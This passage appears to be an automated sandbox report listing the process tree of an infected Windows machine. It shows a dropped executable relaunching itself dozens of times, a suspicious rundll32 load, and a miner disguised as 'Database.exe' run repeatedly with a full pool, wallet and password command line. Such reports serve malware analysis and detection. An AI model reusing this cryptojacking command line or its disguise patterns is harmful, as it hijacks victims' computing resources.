    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:10656
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:4452
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12372
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12964
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11588
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12984
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11960
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6296
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:13560
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:13896
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14156
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:13512
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14120
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11260
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12512
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11544
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14340
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14812
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15184
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14464
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14908
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:8748
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14616
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11528
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14752
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14792
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15864
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15548
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16164
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15620
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15632
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12692
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15836
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14644
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16004
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16708
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:17028
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15180
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16916
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:17828
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18196
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:17652
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16392
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16228
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18464
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18776
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19096
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19424
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15256
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6664
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18824
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:12424
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15412
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19552
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19824
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20052
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20344
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:15744
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19580
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18356
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19796
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:18808
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:17884
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20484
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:16764
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20804
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21152
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21332
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:14896
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21084
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:6344
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20560
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:19524
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:11900
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21312
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20376
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21740
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21992
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:22316
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:20140
- - C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    C:\Users\Admin\Documents\dXnjHNDOir5kHMbGzgfI6bCZ.exe
    3⤵
    PID:21852
- C:\Users\Admin\Documents\8GIdtbcl45kqZOLGO7bJvh1b.exe
  "C:\Users\Admin\Documents\8GIdtbcl45kqZOLGO7bJvh1b.exe"
  2⤵
  - Executes dropped EXE
  PID:3776

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6608
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\10EF.exe
C:\Users\Admin\AppData\Local\Temp\10EF.exe
1⤵
PID:5716
- C:\Users\Admin\AppData\Local\Temp\Zenar.exe
  "C:\Users\Admin\AppData\Local\Temp\Zenar.exe"
  2⤵
  PID:5628
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:5408
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7328
- - C:\ProgramData\Systemd\grid.exe
    NULL
    3⤵
    PID:4472
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7064
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7192
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7744
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7728
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8044
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8156
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7744
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:4696
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7088
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7688
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:3012
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8068
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:2760
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7404
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:6448
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:6724
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8348
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8496
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8616
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8744
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8908
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9056
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9200
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8368
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8592
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8828
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9012
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:6972
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:6868
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8496
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:8828
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:6556
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:7080
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:9040
- - C:\ProgramData\Data\Database.exe
